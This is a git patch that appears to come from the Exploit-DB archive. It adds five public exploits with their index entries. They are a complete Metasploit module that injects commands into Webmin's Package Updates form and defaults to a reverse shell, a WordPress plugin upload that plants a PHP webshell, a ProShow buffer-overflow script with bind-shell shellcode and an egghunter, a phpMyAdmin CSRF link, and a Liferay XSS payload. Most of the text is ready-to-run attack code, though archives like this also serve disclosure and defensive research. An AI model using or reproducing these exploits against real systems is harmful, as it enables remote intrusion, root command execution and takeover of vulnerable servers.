From 29aeb0c030c2ea4294dc6e063b95bbe233b8cf0e Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 12 Jun 2019 05:01:53 +0000
Subject: [PATCH] DB: 2019-06-12

5 changes to exploits/shellcodes

ProShow 9.0.3797 - Local Privilege Escalation

Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution
phpMyAdmin 4.8 - Cross-Site Request Forgery
Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting
---
 exploits/jsp/webapps/46983.txt  |  26 ++++++
 exploits/linux/remote/46984.rb  | 153 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/46981.txt  |  22 +++++
 exploits/php/webapps/46982.txt  |  42 +++++++++
 exploits/windows/local/46980.py |  99 +++++++++++++++++++++
 files_exploits.csv              |   5 ++
 6 files changed, 347 insertions(+)
 create mode 100644 exploits/jsp/webapps/46983.txt
 create mode 100755 exploits/linux/remote/46984.rb
 create mode 100644 exploits/php/webapps/46981.txt
 create mode 100644 exploits/php/webapps/46982.txt
 create mode 100755 exploits/windows/local/46980.py

diff --git a/exploits/jsp/webapps/46983.txt b/exploits/jsp/webapps/46983.txt
new file mode 100644
index 000000000..69d88235e
--- /dev/null
+++ b/exploits/jsp/webapps/46983.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
+# Date: 04/06/2019
+# Exploit Author: Valerio Brussani (@val_brux)
+# Website: www.valbrux.it
+# Vendor Homepage: https://www.liferay.com/
+# Software Link: https://www.liferay.com/it/downloads-community
+# Version: < 7.1 CE GA4
+# Tested on: Liferay Portal 7.1 CE GA3
+# CVE: CVE-2019-6588
+# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
+# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/
+
+
+Introduction
+In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input 
+into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />. 
+A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
+ 
+Poc
+In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form:
+ 
+&xxxx%22%3e%3cscript%3ealert(1)</script> 
+ 
+The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha:
+ 
+<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />
\ No newline at end of file
diff --git a/exploits/linux/remote/46984.rb b/exploits/linux/remote/46984.rb
new file mode 100755
index 000000000..96422462b
--- /dev/null
+++ b/exploits/linux/remote/46984.rb
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
+      'Description'    => %q(
+        This module exploits an arbitrary command execution vulnerability in Webmin
+        1.910 and lower versions. Any user authorized to the "Package Updates"
+        module can execute arbitrary commands with root privileges.
+
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-'],
+          ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.910', {}]],
+      'DisclosureDate' => 'May 16 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptString.new('USERNAME',  [true, 'Webmin Username']),
+        OptString.new('PASSWORD',  [true, 'Webmin Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+      'cookie' => 'testing=1',
+      'vars_post' => {
+        'page' => '',
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD']
+      }
+    })
+
+    if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+      return $1
+    end
+
+    return nil unless res
+    ''
+  end
+##
+# Target and input verification
+##
+  def check
+    cookie = login
+    return CheckCode::Detected if cookie == ''
+    return CheckCode::Unknown if cookie.nil?
+
+    vprint_status('Attempting to execute...')
+    # check package update priv
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path, "package-updates/"),
+      'cookie'  => "sid=#{cookie}"
+    })
+
+    if res && res.code == 200 && res.body =~ /Software Package Update/
+      print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+      return CheckCode::Vulnerable
+    end
+    print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
+    print_status("Please try with another user account!")
+    CheckCode::Safe
+  end
+##
+# Exploiting phase
+##
+  def exploit
+    cookie = login
+    if cookie == '' || cookie.nil?
+      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+    end
+    print_good("Session cookie: #{cookie}")
+
+    res = send_request_raw(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+      'headers' =>
+        {
+          'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
+    )
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Request failed')
+    end
+
+    print_status("Attempting to execute the payload...")
+    exec(cookie)
+
+  end
+
+  def exec(cookie)
+
+    command = payload.encoded
+
+    res = send_request_cgi(
+      {
+      'method' => 'POST',
+      'cookie' => "sid=#{cookie}",
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+      'headers' =>
+        {
+          'Referer' => "#{peer}/package-updates/?xnavigation=1"
+        },
+      'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
+      })
+
+  end
+end
+##
+# The end of the adventure (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/php/webapps/46981.txt b/exploits/php/webapps/46981.txt
new file mode 100644
index 000000000..011def1cb
--- /dev/null
+++ b/exploits/php/webapps/46981.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
+# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive 
+# Date: june 2019
+# Exploit Author: xulchibalraa
+# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
+# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
+# Version: 4.2995 <= 4.2997 
+# Tested on: Wordpress 5.1.1, PHP 5.6 
+# CVE : -
+
+
+## 1. Create a .zip archive with 2 files: index.html, index.php
+
+echo "<html>hello</html>" > index.html
+echo "<?php echo system($_GET['cmd']); ?>" > index.php
+zip poc.zip index.html index.php 
+
+## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
+## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
+## 4. Access the webshell from the URL displayed after upload similar to 
+
+http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
\ No newline at end of file
diff --git a/exploits/php/webapps/46982.txt b/exploits/php/webapps/46982.txt
new file mode 100644
index 000000000..9ac066e84
--- /dev/null
+++ b/exploits/php/webapps/46982.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Cross Site Request Forgery (CSRF)
+# Date: 11 June 2019
+# Exploit Author: Riemann
+# Vendor Homepage: https://www.phpmyadmin.net/
+# Software Link: https://www.phpmyadmin.net/downloads/
+# Version: 4.8
+# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 
+# CVE : 2019-12616
+
+# Description
+# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.	
+
+
+#VULNERABILITY:
+The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST
+<form method="get" action="index.php" class="disableAjax">
+
+GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1
+
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Connection: keep-alive
+Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
+Upgrade-Insecure-Requests: 1
+Host: localhost:9000
+
+The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method
+
+#POC
+<!doctype html>
+
+<html lang="en">
+<head>
+  <meta charset="utf-8">
+  <title>POC CVE-2019-12616</title>
+</head>
+
+<body>
+<a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/local/46980.py b/exploits/windows/local/46980.py
new file mode 100755
index 000000000..451027015
--- /dev/null
+++ b/exploits/windows/local/46980.py
@@ -0,0 +1,99 @@
+#!/usr/bin/python
+# _*_ coding:utf-8 _*_
+
+# Exploit Title: ProShow v9.0.3797 Local Exploit
+# Exploit Author: @Yonatan_Correa
+# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
+# Vendor Homepage: http://www.photodex.com/ProShow
+# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
+# Version: v9.0.3797
+# Tested on: Wind 7
+
+from struct import pack
+
+informacion = """
+
+	ProShow v9.0.3797
+	http://www.photodex.com/ProShow
+
+
+	execute exploit
+	create a file called "load"
+	copy load "C:\Program Files\Photodex\ProShow Producer\"
+	"C:\Program Files\Photodex\ProShow Producer\proshow.exe"
+	And connect nc -nv IP_Host 4444
+
+	Testing: Windows 7
+	@Yonatan_Correa
+	https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
+"""
+
+
+# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
+# Payload size: 717 bytes
+shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
+"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
+"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
+"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
+"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
+"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
+"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
+"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
+"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
+"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
+"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
+"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
+"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
+"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
+"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
+"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
+"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
+"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
+"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
+"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
+"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
+"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
+"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
+"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
+"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
+"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
+"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
+"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
+"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
+"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
+"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
+"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
+"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
+"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
+"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
+"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
+"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
+"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
+"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
+"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
+"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
+"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
+"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
+"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
+"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
+"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41")
+
+junk  = shell + ("\x41" * 9479) # 10204
+nseh = "\xEB\x06\x90\x90"
+seh = pack('<I',0x10045f50) # pop pop ret
+nop = "\x90" * 86
+nop2 = "\x90" * 10
+
+egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+todo = junk + nseh + seh + nop + egg + nop2
+
+arch = open("load", "wb")
+arch.write(todo)
+arch.close()
+
+print informacion
+print "\nCreated File size " + str(len(todo))
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1ebc22f40..e83f4a5f5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10521,6 +10521,7 @@ id,file,description,date,author,type,platform,port
 46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
 46807,exploits/linux/local/46807.txt,"MiniFtp - 'parseconf_load_setting' Buffer Overflow",2019-05-08,strider,local,linux,
 46863,exploits/windows/local/46863.txt,"Iperius Backup 6.1.0 - Privilege Escalation",2019-05-17,bzyo,local,windows,
+46980,exploits/windows/local/46980.py,"ProShow 9.0.3797 - Local Privilege Escalation",2019-06-11,Yonatan_Correa,local,windows,
 46851,exploits/windows/local/46851.txt,"VMware Workstation 15.1.0 - DLL Hijacking",2019-05-16,"Miguel Mendez Z. & Claudio Cortes C.",local,windows,
 46854,exploits/windows/local/46854.py,"JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-16,"Connor McGarr",local,windows,
 46866,exploits/windows/local/46866.c,"Huawei eSpace 1.1.11.103 - DLL Hijacking",2019-05-20,LiquidWorm,local,windows,
@@ -17488,6 +17489,7 @@ id,file,description,date,author,type,platform,port
 46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows,
 46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
 46974,exploits/linux/remote/46974.txt,"Exim 4.87 < 4.91 - (Local / Remote) Command Execution",2019-06-05,"Qualys Corporation",remote,linux,
+46984,exploits/linux/remote/46984.rb,"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)",2019-06-11,AkkuS,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41386,3 +41388,6 @@ id,file,description,date,author,type,platform,port
 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,
 46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,
 46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80
+46981,exploits/php/webapps/46981.txt,"WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution",2019-06-11,xulchibalraa,webapps,php,80
+46982,exploits/php/webapps/46982.txt,"phpMyAdmin 4.8 - Cross-Site Request Forgery",2019-06-11,Riemann,webapps,php,
+46983,exploits/jsp/webapps/46983.txt,"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting",2019-06-11,"Valerio Brussani",webapps,jsp,